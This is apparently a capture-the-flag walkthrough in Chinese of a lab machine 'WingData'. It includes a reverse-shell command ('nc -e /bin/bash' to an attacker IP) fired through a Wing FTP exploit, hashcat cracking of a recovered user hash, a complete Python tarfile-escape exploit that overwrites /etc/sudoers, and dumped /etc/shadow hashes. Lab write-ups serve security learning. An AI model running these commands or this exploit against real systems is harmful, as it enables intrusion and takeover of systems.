基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sC -sV -Pn 10.129.244.63
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-20 13:34 +0900
Nmap scan report for 10.129.244.63
Host is up (0.083s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
| 256 a1:fa:95:8b:d7:56:03:85:e4:45:c9:c7:1e:ba:28:3b (ECDSA)
|_ 256 9c:ba:21:1a:97:2f:3a:64:73:c1:4c:1d:ce:65:7a:2f (ED25519)
80/tcp open http Apache httpd 2.4.66
|_http-server-header: Apache/2.4.66 (Debian)
|_http-title: Did not follow redirect to http://wingdata.htb/
Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.70 seconds

80

需要加hosts:

1
10.129.244.63 wingdata.htb

文件共享相关的:

ftp

client portal是ftp子域名,同样添加hosts后访问,是wing ftp v7.4.3:

CVE-2025-47812

搜索可以找到相关漏洞:

打到wingftp shell:

1
python3 CVE-2025-47812.py -u http://ftp.wingdata.htb/ -c "nc -e /bin/bash 10.10.14.14 4444"

wingftp

然后常规翻目录,得到hash:

1
2
3
4
5
wingftp@wingdata:/opt/wftpserver/Data/1/users$ cat wacky.xml

<UserName>wacky</UserName>

32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca

然后破解出密码,搜索可以知道是SHA256,默认salt是WingFTP:

1
2
3
4
5
6
# hash.txt
32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca:WingFTP

sudo hashcat -m 1410 hash.txt /usr/share/wordlists/rockyou.txt

!#7Blushing^*Bride5

wacky & user flag

得到的密码登录对应的wacky用户:

提权信息

可以sudo运行指定backup脚本:

看脚本就是backup和restore相关的,对文件名和目录都有验证,但可以注意python是3.12.3版本,tarfile可以搜索到已知漏洞,所以我们如果利用这个漏洞在backup文件里写入恶意软链接文件,然后restore释放恶意文件,即可覆盖系统内任意文件

提权 & root flag

所以就是创建一个恶意tar文件来覆写系统文件,例如sudoers:

1
2
3
4
python3 exploit.py
cp backup_9999.tar /opt/backup_clients/backups/

sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py -b backup_9999.tar -r restore_evil

exploit.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
import tarfile
import os
import io
import sys
comp = 'd' * 247
steps = "abcdefghijklmnop"
path = ""
with tarfile.open("/tmp/backup_9999.tar", mode="w") as tar:
for i in steps:
a = tarfile.TarInfo(os.path.join(path, comp))
a.type = tarfile.DIRTYPE
tar.addfile(a)
b = tarfile.TarInfo(os.path.join(path, i))
b.type = tarfile.SYMTYPE
b.linkname = comp
tar.addfile(b)
path = os.path.join(path, comp)
linkpath = os.path.join("/".join(steps), "l"*254)
l = tarfile.TarInfo(linkpath)
l.type = tarfile.SYMTYPE
l.linkname = "../" * len(steps)
tar.addfile(l)
e = tarfile.TarInfo("escape")
e.type = tarfile.SYMTYPE
e.linkname = linkpath + "/../../../../../../../etc"
tar.addfile(e)
f = tarfile.TarInfo("sudoers_link")
f.type = tarfile.LNKTYPE
f.linkname = "escape/sudoers"
tar.addfile(f)
content = b"wacky ALL=(ALL) NOPASSWD: ALL\n"
c = tarfile.TarInfo("sudoers_link")
c.type = tarfile.REGTYPE
c.size = len(content)
tar.addfile(c, fileobj=io.BytesIO(content))
print("[+] Exploit created")

shadow

1
2
3
root:$y$j9T$o4QbpI9MXymg8tQSz73eq0$c1P1OfnBDpSlaHX8xmPTekraDfdl8gj5Xtghz.E5V3A:20394:0:99999:7:::
wingftp:$y$j9T$s62DxCZf.Aqw9qUCF7Fk10$BcBVlkDD7Rm3kpB.jyIWh9o0GvF.cmke6npe25ZnVv1:20394:0:99999:7:::
wacky:$y$j9T$kF5P9XjuPO85qZb/h5hff1$oiwH5i/tHgA4u2FBN/OJJtUO.UMzhfQckEycEPAdQM0:20395:0:99999:7:::

参考资料